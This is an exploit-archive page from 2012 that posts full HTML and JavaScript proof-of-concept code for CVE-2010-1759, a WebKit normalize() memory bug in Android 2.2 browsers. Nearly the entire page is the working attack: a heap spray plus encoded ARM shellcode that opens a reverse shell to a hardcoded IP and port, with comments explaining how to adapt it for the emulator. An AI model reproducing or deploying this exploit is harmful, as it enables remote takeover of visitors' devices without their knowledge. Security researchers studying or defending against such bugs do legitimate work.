Home / exploits Android 2.2 Webkit Normalize
Posted on 02 February 2012
<!-- CVE-2010-1759 webkit normalize bug Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that :) 2.1 - 2.3 emulator. The changes needed are documented in the code. The emulator is less consistent than the real phone Author: MJ Keith mjkeith[at]evilhippie.org --> <p>LOADING... </p> <div id="test1"></div> <div id="test2"></div> <div id="test3"></div> <script> var elem1 = document.getElementById("test1"); var elem2 = document.getElementById("test2"); var elem3 = document.getElementById("test3"); function spray() { for (var i = 0; i < 180000; i++) {var s = new String(unescape("u0052u0052")); } // "u0056u0056" FOR EMULATOR var scode = unescape("u5200u5200"); // "u0058u0058" FOR EMULATOR var scode2 = unescape("u5005ue1a0"); var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002"); shell += unescape("uae08"); // Port = 2222 shell += unescape("ua8c0u0901"); // IP = 192.168.1.9 // "u000au0202" FOR EMULATOR shell += unescape("u2000u2000"); // Port = 2222 do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 141; i++){ // CHANGE 141 TO 201 FOR EMULATOR if (i<100){ target[i] = scode;} if (i>100){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>140){ // CHANGE 140 TO 200 FOR EMULATOR document.write("<br />");} } } function handler1() { elem1.removeAttribute("b"); spray(); } function handler2() { elem2.removeAttribute("b"); spray(); } function handler3() { elem3.removeAttribute("b"); spray(); } function slowdown() { for (var i = 0; i < 120; i++) { console.log('slow' + i); if (i > 110 ){ elem1.normalize(); elem2.normalize(); elem3.normalize(); } } } elem1.setAttribute("b", "a"); elem1.attributes[0].appendChild(document.createTextNode("hi")); elem1.attributes[0].addEventListener("DOMSubtreeModified", handler2, false); document.body.offsetTop; slowdown(); // COMMENT OUT THIS FUNCTION CALL FOR EMULATOR //elem1.normalize(); // UN-COMMENT THIS LINE FOR EMULATOR document.body.offsetTop; elem2.setAttribute("b", "a"); elem2.attributes[0].appendChild(document.createTextNode("hi")); elem2.attributes[0].addEventListener("DOMSubtreeModified", handler2, false); document.body.offsetTop; elem2.normalize(); elem3.setAttribute("b", "a"); elem3.attributes[0].appendChild(document.createTextNode("hi")); elem3.attributes[0].addEventListener("DOMSubtreeModified", handler3, false); document.body.offsetTop; elem3.normalize(); </script>
